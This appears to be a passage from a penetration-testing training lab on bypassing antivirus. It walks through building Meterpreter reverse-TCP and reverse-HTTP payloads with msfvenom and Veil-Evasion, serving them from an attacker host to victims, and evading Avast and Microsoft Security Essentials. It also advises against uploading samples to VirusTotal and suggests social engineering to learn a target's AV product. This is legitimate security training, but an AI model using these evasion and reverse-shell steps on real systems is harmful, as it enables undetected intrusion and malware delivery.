Professional Documents
Culture Documents
© 2018 Caendra, Inc. - Hera For PTP - Bypassing AV
© 2018 Caendra, Inc. - Hera For PTP - Bypassing AV
Victim01-Avast Victim02-MSE
172.16.5.10 172.16.5.5
Network 172.16.5.0
Pentester – Your PC
172.16.5.x
To guide you during the lab you will find different Tasks.
Tasks are meant for educational purposes and to show you the usage of different tools and
different methods to achieve the same goal.
Armed with the skills acquired though the task you can achieve the Lab goal.
If this is the first time you do this lab, we advise you to follow these Tasks.
Once you have completed all the Tasks, you can proceed to the end of this paper and check
the solutions.
• Metasploit
• Veil
Hint: In both systems (172.16.5.5 and 172.16.5.10), you can login via rdesktop, with the
username admin and the password et1@sR7!
To check the huge list of available payloads, run from the console the following command:
root@kali:~/LABS/16# msfvenom -l
This is the command that will generate our first malicious code:
• -p Windows/Meterpreter/Reverse_tcp
The payload to add into our shellcode. Once executed it will launch a Reverse TCP
meterpreter shell to our system at 172.16.5.50 to port 4444. We'll need to have
the multi/handler module running and waiting for incoming connections on that
port and IP.
• LHOST=172.16.5.50
Our listening IP address
• LPORT=4444
The listening port on which the victim will connect back. Keep in mind that with a
firewall in the middle of these systems we must pick a port that is allowed.
• -f exe
The file format
Now, we need to upload our malicious file, rTCP.exe, onto our victim system:
172.16.5.10. To do this, we'll start a local webserver with python’s “SimpleHTTPServer”
module, and then will copy the shell in the web root. Later, we'll download this file form the
victim machine.
Now, we need to start the multi/handler exploit from Metasploit. In this way, we'll have
something listening from when the victim will open the rTCP.exe file.
Since we are going to download our malicious shell, let’s disable Avast AV. Open Avast
from the desktop icon, and then from settings > Active Protection, disable all the
options:
Now, open Chrome and download the rTCP.exe from our webserver:
meterpreter >
Let's query the shell by asking some basic information, like the following:
And in a similar way we can run other commands. But now, let's close the meterpreter
session by sending the quit command.
Then, download the new file, eTCPenc.exe and check if Avast is able to detect it:
In newer versions of kali (rolling), it can be installed with the following command:
root@kali:~/LABS/16# veil
===============================================================================
Veil | [Version]: 3.1.7
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Main Menu
2 tools loaded
Available Tools:
1) Evasion
2) Ordnance
Available Commands:
Veil>:
Veil>: use 1
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
41 payloads loaded
Available Commands:
Veil/Evasion>: list
…
25) python/meterpreter/bind_tcp.py
26) python/meterpreter/rev_http.py
27) python/meterpreter/rev_https.py
28) python/meterpreter/rev_tcp.py
29) python/shellcode_inject/aes_encrypt.py
30) python/shellcode_inject/arc_encrypt.py
31) python/shellcode_inject/base64_substitution.py
…
Veil/Evasion>: use 26
===============================================================================
Veil-Evasion
===============================================================================
[Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================
Payload Information:
Required Options:
Available Commands:
[python/meterpreter/rev_http>>]: generate
Next, we need to assign a name for the malicious file that we are creating. In this example,
let’s use the name rTCPveil, no extension is needed:
[>] Please enter the base name for output files (default is payload): rTCPveil
1 - PyInstaller (default)
2 - Py2Exe
Then, once again, let’s copy the executable created by veil to our locat directory, so we can
download it in our victim machine, using the python SimpleHTTPServer.
root@kali:~/LABS/16# cp /var/lib/veil/output/compiled/rTCPveil.exe .
After that, connect into the system 172.16.5.10 (where Avast is installed and enabled)
and then download this new executable (rTCPveil.exe) and see if you are still detected by
the antivirus.
If everything went well, you will be able to download the executable successfully. Then, go
back to the multi/handler exploit and see if you got a meterpreter session from the system
172.16.5.10 after the malware was ran:
Type ps in the meterpreter session and see if you are able to see one of the Avast
executable still running in that system. It confirms that we were able to successfully get
unnoticed by Avast.
Process List
============
We do not recommend that you upload your malicious files generated by any source
(msfvenom, veil, etc.) to online AV scanners like www.virustotal.com, thus, because later
on these files are shared with AV companies who will be able to create signatures to catch
them. The best thing to do is first, find out what your target’s customer use as AV solution
(see job posts and forums in order to see if its published somewhere. You may also use
your social engineering skills (call and ask) and you will be surprised how people share this
information without any concerns. Then download a trial version of the AV solution used
by your customer in a lab environment and update it to the latest virus definition. Once you
are able to bypass it, you can deliver the piece of code considering that it’s part of your
engagement’s scope.
I have uploaded the piece of code generated by veil (according to the steps above) to
Virustotal so you can have an idea about how it’s really powerful (only 3 from 50 vendors
detected it):
If everything goes well, the same piece of malware generated by veil (above) should bypass
MSE as well.